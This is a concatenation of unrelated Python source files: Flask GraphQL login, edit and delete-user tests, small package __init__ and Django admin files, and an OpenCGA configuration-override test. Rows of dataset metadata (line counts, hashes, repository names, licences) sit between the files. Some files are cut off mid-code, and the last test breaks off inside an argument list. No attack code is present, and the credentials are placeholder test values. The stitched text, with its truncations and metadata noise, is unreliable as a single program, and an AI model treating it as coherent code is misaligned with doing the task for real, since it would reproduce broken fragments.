query = '''mutation{
loginUser(password:"test"){
success
message
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("loginUser").get("message") == "Please enter your email/username to login."
def test_invalid_username(self):
query = '''mutation{
loginUser(username:"wrong_name", password:"test"){
success
message
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("loginUser").get("message") == "Invalid username/email or password."
def test_invalid_email(self):
query = '''mutation{
loginUser(email:"wrong_email", password:"test"){
success
message
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("loginUser").get("message") == "Invalid username/email or password."
def test_invalid_password(self):
query = '''mutation{
loginUser(username:"test_user", password:"wrong_pw"){
success
message
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("loginUser").get("message") == "Invalid username/email or password."
class TestCreatAccessToken(unittest.TestCase):
def setUp(self):
self.app = create_app()
self.app.config.from_object(TestingConfig)
self.client = self.app.test_client()
with self.app.app_context():
db.create_all()
query = '''mutation{
createUser(email:"test@user.com", username:"test_user", password:"test", fname:"test", surname:"dummy"){
success
message
}
}'''
self.client.post("/graphql", data={"query": query})
def tearDown(self):
with self.app.app_context():
db.drop_all()
def get_refresh_token(self, username, password):
query = '''mutation{
loginUser(username:"test_user", password:"test"){
success
message
refreshToken
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
return data.get("data").get("loginUser").get("refreshToken")
def test_successful_refresh_token(self):
query = '''mutation{
getAccessToken {
accessToken
success
message
}
}'''
headers = {"Authorization": "Bearer " + self.get_refresh_token("test_user", "test")}
response = self.client.post("/graphql", data={"query": query}, headers=headers)
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("getAccessToken").get("message") == "Access token created successfully."
class TestEditUser(unittest.TestCase):
def setUp(self):
self.app = create_app()
self.app.config.from_object(TestingConfig)
self.client = self.app.test_client()
with self.app.app_context():
db.create_all()
query = '''mutation{
createUser(email:"test@user.com", username:"test_user", password:"test", fname:"test", surname:"dummy"){
success
message
}
}'''
self.client.post("/graphql", data={"query": query})
def tearDown(self):
with self.app.app_context():
db.drop_all()
def get_access_token(self, username, password):
query = '''mutation{
loginUser(username:"test_user", password:"test"){
success
message
accessToken
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
return data.get("data").get("loginUser").get("accessToken")
def test_successful_edit(self):
query = '''mutation{
editUser(username:"test_user_changed"){
success
message
user{
username
}
}
}'''
headers = {"Authorization": "Bearer " + self.get_access_token("test_user", "test")}
response = self.client.post("/graphql", data={"query": query}, headers=headers)
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("editUser").get("success") == True
assert data.get("data").get("editUser").get("user").get("username") == "test_user_changed"
def test_no_data_supplied(self):
query = '''mutation{
editUser{
success
message
user{
username
}
}
}'''
headers = {"Authorization": "Bearer " + self.get_access_token("test_user", "test")}
response = self.client.post("/graphql", data={"query": query}, headers=headers)
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("editUser").get("message") == "Please supply some data to edit user with."
def test_username_taken(self):
query = '''mutation{
editUser(username:"test_user"){
success
message
}
}'''
headers = {"Authorization": "Bearer " + self.get_access_token("test_user", "test")}
response = self.client.post("/graphql", data={"query": query}, headers=headers)
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("editUser").get("message") == "That username is already taken. Please try again with different username."
def test_email_taken(self):
query = '''mutation{
editUser(email:"test@user.com"){
success
message
}
}'''
headers = {"Authorization": "Bearer " + self.get_access_token("test_user", "test")}
response = self.client.post("/graphql", data={"query": query}, headers=headers)
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("editUser").get("message") == "That email is already in use. Please try again with different email."
class TestDeleteUser:
def setUp(self):
self.app = create_app()
self.app.config.from_object(TestingConfig)
self.client = self.app.test_client()
with self.app.app_context():
db.create_all()
query = '''mutation{
createUser(email:"test@user.com", username:"test_user", password:"test", fname:"test", surname:"dummy"){
success
message
}
}'''
self.client.post("/graphql", data={"query": query})
def tearDown(self):
with self.app.app_context():
db.drop_all()
def get_access_token(self, username, password):
query = '''mutation{
loginUser(username:"test_user", password:"test"){
success
message
accessToken
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
return data.get("data").get("loginUser").get("accessToken")
def test_successful_user_delete(self):
query = '''mutation{
deleteUser{
success
message
}
}'''
headers = {"Authorization": "Bearer " + self.get_access_token("test_user", "test")}
response = self.client.post("/graphql", data={"query": query}, headers=headers)
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("deleteUser").get("success") == True
| 36.4
| 143
| 0.519032
| 1,222
| 12,558
| 5.212766
| 0.082651
| 0.03956
| 0.050549
| 0.075824
| 0.873626
| 0.847724
| 0.828728
| 0.789011
| 0.756515
| 0.756515
| 0
| 0.000732
| 0.34703
| 12,558
| 344
| 144
| 36.505814
| 0.776098
| 0
| 0
| 0.713235
| 0
| 0.025735
| 0.463211
| 0.059484
| 0
| 0
| 0
| 0
| 0.055147
| 1
| 0.099265
| false
| 0.080882
| 0.022059
| 0
| 0.150735
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
4f28a5c578cb66cd605db53c4108d37e18df02ab
| 152
|
py
|
Python
|
agutil/io/__init__.py
|
agraubert/agutil
|
d9a568df01959ed985c9c8e77bdd501ac13bdbbf
|
[
"MIT"
] | 3
|
2017-06-05T15:46:22.000Z
|
2019-05-22T21:26:54.000Z
|
agutil/io/__init__.py
|
agraubert/agutil
|
d9a568df01959ed985c9c8e77bdd501ac13bdbbf
|
[
"MIT"
] | 93
|
2016-06-22T18:57:47.000Z
|
2022-02-14T10:50:27.000Z
|
agutil/io/__init__.py
|
agraubert/agutil
|
d9a568df01959ed985c9c8e77bdd501ac13bdbbf
|
[
"MIT"
] | null | null | null |
from .src.socket import Socket
from .src.socket import SocketServer
from .src.queuedsocket import QueuedSocket
from .src.mplexsocket import MPlexSocket
| 30.4
| 42
| 0.842105
| 20
| 152
| 6.4
| 0.35
| 0.21875
| 0.203125
| 0.296875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 152
| 4
| 43
| 38
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4f317e066e36fdf6e670947587e3f0d182bd7e0c
| 178
|
py
|
Python
|
LAB 6/myproj/netflixapp/admin.py
|
giachell/FIS_21-22
|
eda14dabfb2ad73f307a31b26e8112bcceba4b36
|
[
"MIT"
] | 2
|
2021-11-20T10:56:31.000Z
|
2021-11-26T13:33:46.000Z
|
LAB 6/myproj/netflixapp/admin.py
|
giachell/FIS_21-22
|
eda14dabfb2ad73f307a31b26e8112bcceba4b36
|
[
"MIT"
] | null | null | null |
LAB 6/myproj/netflixapp/admin.py
|
giachell/FIS_21-22
|
eda14dabfb2ad73f307a31b26e8112bcceba4b36
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
# Register your models here.
from django.contrib import admin
# Register your models here
from .models import Movie
admin.site.register(Movie)
| 19.777778
| 32
| 0.803371
| 26
| 178
| 5.5
| 0.423077
| 0.13986
| 0.237762
| 0.321678
| 0.727273
| 0.727273
| 0.727273
| 0.727273
| 0.727273
| 0.727273
| 0
| 0
| 0.140449
| 178
| 9
| 33
| 19.777778
| 0.934641
| 0.292135
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
4f39e71946e0fad0b229faa061580ce3eb45db6b
| 147
|
py
|
Python
|
tests/test_cca.py
|
sagar87/cca
|
b4de1c9a46643e3a458bdc773d254f7fb9873d18
|
[
"MIT"
] | null | null | null |
tests/test_cca.py
|
sagar87/cca
|
b4de1c9a46643e3a458bdc773d254f7fb9873d18
|
[
"MIT"
] | null | null | null |
tests/test_cca.py
|
sagar87/cca
|
b4de1c9a46643e3a458bdc773d254f7fb9873d18
|
[
"MIT"
] | null | null | null |
import numpy as np
from cca.cca import CCA
def test_CCA():
pass
# Y = [np.zeros((10, 10)), np.zeros((10, 10))]
# model = CCA(Y, 5)
| 13.363636
| 50
| 0.557823
| 26
| 147
| 3.115385
| 0.538462
| 0.17284
| 0.222222
| 0.271605
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 0.265306
| 147
| 10
| 51
| 14.7
| 0.666667
| 0.421769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
4f67a6e9be1bb29059aefd806964c3981a8a122c
| 214
|
py
|
Python
|
tests/__init__.py
|
contentful/structured-text-renderer.py
|
84fdd139bef2bbc02182a7eba2762604d0777956
|
[
"MIT"
] | 4
|
2019-02-23T20:04:42.000Z
|
2022-01-18T18:23:26.000Z
|
tests/__init__.py
|
contentful/structured-text-renderer.py
|
84fdd139bef2bbc02182a7eba2762604d0777956
|
[
"MIT"
] | 3
|
2018-11-27T22:40:58.000Z
|
2020-10-03T17:54:07.000Z
|
tests/__init__.py
|
contentful/structured-text-renderer.py
|
84fdd139bef2bbc02182a7eba2762604d0777956
|
[
"MIT"
] | 6
|
2019-02-11T16:06:24.000Z
|
2022-01-26T14:18:37.000Z
|
import os
import sys
from .text_renderers_test import *
from .block_renderers_test import *
from .document_renderers_test import *
from .rich_text_renderer_test import *
sys.path.insert(0, os.path.abspath(".."))
| 21.4
| 41
| 0.78972
| 32
| 214
| 5
| 0.46875
| 0.25
| 0.35625
| 0.43125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005263
| 0.11215
| 214
| 9
| 42
| 23.777778
| 0.836842
| 0
| 0
| 0
| 0
| 0
| 0.009346
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.857143
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4f9c2fa3c0dacb4885092fe1c04217763dd14abc
| 29,328
|
py
|
Python
|
opencga-app/app/cloud/docker/opencga-init/test/test_override_yaml.py
|
julie-sullivan/opencga
|
9aa03191677a10a8ff805a9d343bbebe71c53b68
|
[
"Apache-2.0"
] | null | null | null |
opencga-app/app/cloud/docker/opencga-init/test/test_override_yaml.py
|
julie-sullivan/opencga
|
9aa03191677a10a8ff805a9d343bbebe71c53b68
|
[
"Apache-2.0"
] | null | null | null |
opencga-app/app/cloud/docker/opencga-init/test/test_override_yaml.py
|
julie-sullivan/opencga
|
9aa03191677a10a8ff805a9d343bbebe71c53b68
|
[
"Apache-2.0"
] | null | null | null |
import subprocess
from shutil import copyfile
import unittest
import yaml
from io import StringIO
import sys
import os
os.chdir(sys.path[0])
class Test_init_script(unittest.TestCase):
def setUp(self):
if "OPENCGA_CONFIG_DIR" in os.environ:
config_dir = os.environ["OPENCGA_CONFIG_DIR"]
else:
config_dir = "./conf"
storage_config = os.path.join(config_dir, "storage-configuration.yml")
copyfile(storage_config, "./storage-configuration.yml")
client_config = os.path.join(config_dir, "client-configuration.yml")
copyfile(client_config, "./client-configuration.yml")
config = os.path.join(config_dir, "configuration.yml")
copyfile(config, "./configuration.yml")
def test_end_2_end(self):
res = subprocess.run(
[
"python3", "../override_yaml.py",
"--config-path", "./configuration.yml",
"--client-config-path", "./client-configuration.yml",
"--storage-config-path", "./storage-configuration.yml",
"--search-hosts", "test-search-host1,test-search-host2",
"--catalog-database-hosts", "test-catalog-database-host1,test-catalog-database-host2,test-catalog-database-host3",
"--catalog-database-user", "test-catalog-database-user",
"--catalog-database-password", "test-catalog-database-password",
"--catalog-search-hosts", "test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user", "test-catalog-search-user",
"--catalog-search-password", "test-catalog-search-password",
"--rest-host", "test-rest-host",
"--grpc-host", "test-grpc-host",
"--max-concurrent-jobs", "25",
"--analysis-execution-mode", "test-analysis-execution-mode",
"--variant-default-engine","test-variant-default-engine",
"--hadoop-ssh-dns", "test-hadoop-ssh-host",
"--hadoop-ssh-user", "test-hadoop-ssh-user",
"--hadoop-ssh-pass", "test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home", "test-hadoop-ssh-remote-opencga-home",
"--health-check-interval", "30"
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
env={**os.environ,
"INIT_CLINICAL_HOSTS": "test-clinical-host",
"INIT_VARIANT_OPTIONS": "[ my_var_key_1=my_value_1, my.var.key_2=my.value.2,]"
}, #Test that the auto import of environment vars is working
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
storage_config = configs[0]
config = configs[1]
client_config = configs[2]
self.assertEqual(storage_config["search"]["hosts"][0], "test-search-host1")
self.assertEqual(storage_config["search"]["hosts"][1], "test-search-host2")
self.assertEqual(storage_config["clinical"]["hosts"][0], "test-clinical-host")
self.assertEqual(
storage_config["variant"]["defaultEngine"],
"test-variant-default-engine",
)
self.assertEqual(
storage_config["variant"]["options"]["annotator"],
"cellbase",
)
self.assertEqual(
storage_config["variant"]["engines"][1]["options"][
"storage.hadoop.mr.executor"
],
"ssh",
)
self.assertEqual(
storage_config["variant"]["engines"][1]["options"][
"storage.hadoop.mr.executor.ssh.host"
],
"test-hadoop-ssh-host",
)
self.assertEqual(
storage_config["variant"]["engines"][1]["options"][
"storage.hadoop.mr.executor.ssh.user"
],
"test-hadoop-ssh-user",
)
self.assertEqual(
storage_config["variant"]["engines"][1]["options"][
"storage.hadoop.mr.executor.ssh.password"
],
"test-hadoop-ssh-password",
)
self.assertEqual(
storage_config["variant"]["engines"][1]["options"][
"storage.hadoop.mr.executor.ssh.key"
],
"",
)
self.assertEqual(
storage_config["variant"]["engines"][1]["options"][
"storage.hadoop.mr.executor.ssh.remoteOpenCgaHome"
],
"test-hadoop-ssh-remote-opencga-home",
)
print("Variant options: ", storage_config["variant"]["options"])
# self.assertEqual(
# storage_config["variant"]["options"][
# "my_key"
# ],
# "my_value",
# )
# self.assertEqual(
# storage_config["variant"]["options"][
# "second_key"
# ],
# "my.otherValue",
# )
self.assertEqual(
storage_config["variant"]["options"][
"my_var_key_1"
],
"my_value_1",
)
self.assertEqual(
storage_config["variant"]["options"][
"my.var.key_2"
],
"my.value.2",
)
self.assertEqual(config["healthCheck"]["interval"], "30")
self.assertEqual(
config["catalog"]["database"]["hosts"][0], "test-catalog-database-host1"
)
self.assertEqual(
config["catalog"]["database"]["hosts"][1], "test-catalog-database-host2"
)
self.assertEqual(
config["catalog"]["database"]["hosts"][2], "test-catalog-database-host3"
)
self.assertEqual(
config["catalog"]["database"]["user"], "test-catalog-database-user"
)
self.assertEqual(
config["catalog"]["database"]["password"], "test-catalog-database-password"
)
self.assertEqual(config["catalog"]["database"]["options"]["sslEnabled"], True)
self.assertEqual(config["catalog"]["database"]["options"]["sslInvalidCertificatesAllowed"], True)
self.assertEqual(config["catalog"]["database"]["options"]["authenticationDatabase"], "admin")
self.assertEqual(
config["catalog"]["searchEngine"]["hosts"][0], "test-catalog-search-host1"
)
self.assertEqual(
config["catalog"]["searchEngine"]["hosts"][1], "test-catalog-search-host2"
)
self.assertEqual(
config["catalog"]["searchEngine"]["user"], "test-catalog-search-user"
)
self.assertEqual(
config["catalog"]["searchEngine"]["password"], "test-catalog-search-password"
)
self.assertEqual(config["analysis"]["execution"]["id"], "test-analysis-execution-mode")
self.assertEqual(config["analysis"]["execution"]["maxConcurrentJobs"]["variant-index"], 25)
self.assertEqual(client_config["rest"]["host"], "test-rest-host")
self.assertEqual(client_config["grpc"]["host"], "test-grpc-host")
def test_azure_batch_execution(self):
res = subprocess.run(
[
"python3", "../override_yaml.py",
"--config-path", "./configuration.yml",
"--client-config-path", "./client-configuration.yml",
"--storage-config-path", "./storage-configuration.yml",
"--search-hosts", "test-search-host1,test-search-host2",
"--clinical-hosts", "test-clinical-host",
"--catalog-database-hosts", "test-catalog-database-host1,test-catalog-database-host2,test-catalog-database-host3",
"--catalog-database-user", "test-catalog-database-user",
"--catalog-database-password", "test-catalog-database-password",
"--catalog-search-hosts", "test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user", "test-catalog-search-user",
"--catalog-search-password", "test-catalog-search-password",
"--rest-host", "test-rest-host",
"--grpc-host", "test-grpc-host",
"--analysis-execution-mode", "AZURE",
"--batch-account-name", "test-batch-account-name",
"--batch-account-key", "test-batch-account-key",
"--batch-endpoint", "test-batch-endpoint",
"--batch-pool-id", "test-batch-pool-id",
"--max-concurrent-jobs", "25",
"--variant-default-engine","test-variant-default-engine",
"--hadoop-ssh-dns", "test-hadoop-ssh-host",
"--hadoop-ssh-user", "test-hadoop-ssh-user",
"--hadoop-ssh-pass", "test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home", "test-hadoop-ssh-remote-opencga-home",
"--health-check-interval", "30"
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
storage_config = configs[0]
config = configs[1]
client_config = configs[2]
self.assertEqual(
config["analysis"]["execution"]["id"], "AZURE"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["azure.batchAccount"], "test-batch-account-name"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["azure.batchKey"], "test-batch-account-key"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["azure.batchUri"], "test-batch-endpoint"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["azure.batchPoolId"], "test-batch-pool-id"
)
self.assertEqual(client_config["rest"]["host"], "test-rest-host")
self.assertEqual(client_config["grpc"]["host"], "test-grpc-host")
def test_kubernetes_execution(self):
res = subprocess.run(
[
"python3", "../override_yaml.py",
"--config-path", "./configuration.yml",
"--client-config-path", "./client-configuration.yml",
"--storage-config-path", "./storage-configuration.yml",
"--search-hosts", "test-search-host1,test-search-host2",
"--clinical-hosts",
"test-clinical-host",
"--catalog-database-hosts", "test-catalog-database-host1,test-catalog-database-host2,test-catalog-database-host3",
"--catalog-database-user", "test-catalog-database-user",
"--catalog-database-password", "test-catalog-database-password",
"--catalog-search-hosts", "test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user", "test-catalog-search-user",
"--catalog-search-password", "test-catalog-search-password",
"--rest-host", "test-rest-host",
"--grpc-host", "test-grpc-host",
"--analysis-execution-mode", "k8s",
"--k8s-master-node","test-k8s-master-node",
"--k8s-volumes-pvc-conf","my-pvc-conf",
"--k8s-volumes-pvc-sessions","my-pvc-sessions",
"--k8s-volumes-pvc-variants","my-pvc-variants",
"--k8s-volumes-pvc-analysisconf","my-pvc-analysisconf",
"--max-concurrent-jobs", "25",
"--variant-default-engine","test-variant-default-engine",
"--hadoop-ssh-dns", "test-hadoop-ssh-host",
"--hadoop-ssh-user", "test-hadoop-ssh-user",
"--hadoop-ssh-pass", "test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home", "test-hadoop-ssh-remote-opencga-home",
"--health-check-interval", "30"
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
storage_config = configs[0]
config = configs[1]
client_config = configs[2]
self.assertEqual(
config["analysis"]["scratchDir"], "/tmp/opencga_scratch"
)
self.assertEqual(
config["analysis"]["execution"]["id"], "k8s"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["k8s.volumes"][0]["persistentVolumeClaim"]["claimName"], "my-pvc-conf"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["k8s.volumes"][1]["persistentVolumeClaim"]["claimName"], "my-pvc-sessions"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["k8s.volumes"][2]["persistentVolumeClaim"]["claimName"], "my-pvc-variants"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["k8s.volumes"][3]["persistentVolumeClaim"]["claimName"], "my-pvc-analysisconf"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["k8s.masterUrl"], "test-k8s-master-node"
)
def test_cellbasedb_with_empty_hosts(self):
res = subprocess.run(
[
"python3",
"../override_yaml.py",
"--config-path",
"./configuration.yml",
"--client-config-path",
"./client-configuration.yml",
"--storage-config-path",
"./storage-configuration.yml",
"--search-hosts",
"test-search-host1,test-search-host2",
"--clinical-hosts",
"test-clinical-host",
"--catalog-database-hosts",
"test-catalog-host",
"--catalog-database-user",
"test-catalog-database-user",
"--catalog-database-password",
"test-catalog-database-password",
"--catalog-search-hosts",
"test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user",
"test-catalog-search-user",
"--catalog-search-password",
"test-catalog-search-password",
"--rest-host",
"test-rest-host",
"--grpc-host",
"test-grpc-host",
"--analysis-execution-mode",
"test-analysis-execution-mode",
"--batch-account-name",
"test-batch-account-name",
"--batch-account-key",
"test-batch-account-key",
"--batch-endpoint",
"test-batch-endpoint",
"--batch-pool-id",
"test-batch-pool-id",
"--max-concurrent-jobs",
"25",
"--variant-default-engine",
"test-variant-default-engine",
"--hadoop-ssh-dns",
"test-hadoop-ssh-host",
"--hadoop-ssh-user",
"test-hadoop-ssh-user",
"--hadoop-ssh-pass",
"test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home",
"test-hadoop-ssh-remote-opencga-home",
"--health-check-interval",
"30",
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
storage_config = configs[0]
self.assertEqual(
storage_config["variant"]["options"]["annotator"],
"cellbase",
)
def test_cellbasedb_with_no_db_hosts(self):
res = subprocess.run(
[
"python3",
"../override_yaml.py",
"--config-path",
"./configuration.yml",
"--client-config-path",
"./client-configuration.yml",
"--storage-config-path",
"./storage-configuration.yml",
"--search-hosts",
"test-search-host1,test-search-host2",
"--clinical-hosts",
"test-clinical-host",
"--catalog-database-hosts",
"test-catalog-host",
"--catalog-database-user",
"test-catalog-database-user",
"--catalog-database-password",
"test-catalog-database-password",
"--catalog-search-hosts",
"test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user",
"test-catalog-search-user",
"--catalog-search-password",
"test-catalog-search-password",
"--rest-host",
"test-rest-host",
"--grpc-host",
"test-grpc-host",
"--analysis-execution-mode",
"test-analysis-execution-mode",
"--batch-account-name",
"test-batch-account-name",
"--batch-account-key",
"test-batch-account-key",
"--batch-endpoint",
"test-batch-endpoint",
"--batch-pool-id",
"test-batch-pool-id",
"--max-concurrent-jobs",
"25",
"--variant-default-engine",
"test-variant-default-engine",
"--hadoop-ssh-dns",
"test-hadoop-ssh-host",
"--hadoop-ssh-user",
"test-hadoop-ssh-user",
"--hadoop-ssh-pass",
"test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home",
"test-hadoop-ssh-remote-opencga-home",
"--health-check-interval",
"30",
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
storage_config = configs[0]
self.assertEqual(
storage_config["variant"]["options"]["annotator"],
"cellbase",
)
def test_cellbase_rest_set(self):
res = subprocess.run(
[
"python3",
"../override_yaml.py",
"--cellbase-rest-url",
"http://test-cellbase-server1:8080",
"--config-path",
"./configuration.yml",
"--client-config-path",
"./client-configuration.yml",
"--storage-config-path",
"./storage-configuration.yml",
"--search-hosts",
"test-search-host1,test-search-host2",
"--clinical-hosts",
"test-clinical-host",
"--catalog-database-hosts",
"test-catalog-host",
"--catalog-database-user",
"test-catalog-database-user",
"--catalog-database-password",
"test-catalog-database-password",
"--catalog-search-hosts",
"test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user",
"test-catalog-search-user",
"--catalog-search-password",
"test-catalog-search-password",
"--rest-host",
"test-rest-host",
"--grpc-host",
"test-grpc-host",
"--analysis-execution-mode",
"test-analysis-execution-mode",
"--batch-account-name",
"test-batch-account-name",
"--batch-account-key",
"test-batch-account-key",
"--batch-endpoint",
"test-batch-endpoint",
"--batch-pool-id",
"test-batch-pool-id",
"--max-concurrent-jobs",
"25",
"--variant-default-engine",
"test-variant-default-engine",
"--hadoop-ssh-dns",
"test-hadoop-ssh-host",
"--hadoop-ssh-user",
"test-hadoop-ssh-user",
"--hadoop-ssh-pass",
"test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home",
"test-hadoop-ssh-remote-opencga-home",
"--health-check-interval",
"30",
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
storage_config = configs[0]
self.assertEqual(
storage_config["variant"]["options"]["annotator"],
"cellbase",
)
self.assertEqual(
storage_config["cellbase"]["host"], "http://test-cellbase-server1:8080"
)
def test_cellbase_rest_empty_set(self):
res = subprocess.run(
[
"python3",
"../override_yaml.py",
"--cellbase-rest-url",
"",
"--config-path",
"./configuration.yml",
"--client-config-path",
"./client-configuration.yml",
"--storage-config-path",
"./storage-configuration.yml",
"--search-hosts",
"test-search-host1,test-search-host2",
"--clinical-hosts",
"test-clinical-host",
"--catalog-database-hosts",
"test-catalog-host",
"--catalog-database-user",
"test-catalog-database-user",
"--catalog-database-password",
"test-catalog-database-password",
"--catalog-search-hosts",
"test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user",
"test-catalog-search-user",
"--catalog-search-password",
"test-catalog-search-password",
"--rest-host",
"test-rest-host",
"--grpc-host",
"test-grpc-host",
"--analysis-execution-mode",
"test-analysis-execution-mode",
"--batch-account-name",
"test-batch-account-name",
"--batch-account-key",
"test-batch-account-key",
"--batch-endpoint",
"test-batch-endpoint",
"--batch-pool-id",
"test-batch-pool-id",
"--max-concurrent-jobs",
"25",
"--variant-default-engine",
"test-variant-default-engine",
"--hadoop-ssh-dns",
"test-hadoop-ssh-host",
"--hadoop-ssh-user",
"test-hadoop-ssh-user",
"--hadoop-ssh-pass",
"test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home",
"test-hadoop-ssh-remote-opencga-home",
"--health-check-interval",
"30",
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
storage_config = configs[0]
self.assertEqual(
storage_config["variant"]["options"]["annotator"],
"cellbase",
)
self.assertEqual(
storage_config["cellbase"]["host"],
"https://ws.opencb.org/cellbase/",
)
def test_cellbase_rest_not_set(self):
res = subprocess.run(
[
"python3",
"../override_yaml.py",
"--config-path",
"./configuration.yml",
"--client-config-path",
"./client-configuration.yml",
"--storage-config-path",
"./storage-configuration.yml",
"--search-hosts",
"test-search-host1,test-search-host2",
"--clinical-hosts",
"test-clinical-host",
"--catalog-database-hosts",
"test-catalog-host",
"--catalog-database-user",
"test-catalog-database-user",
"--catalog-database-password",
